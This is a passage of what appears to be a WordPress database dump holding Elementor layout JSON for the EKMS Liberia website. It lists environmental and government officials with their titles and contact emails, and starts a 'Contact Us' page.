\\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\nManager, ESIA\\nDepartment of Compliance and Enforcement\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23337,3389,'_elementor_edit_mode','builder'),(23338,3389,'_elementor_template_type','wp-page'),(23339,3389,'_elementor_version','3.0.16'),(23340,3389,'_wp_page_template','default'),(23341,3389,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge 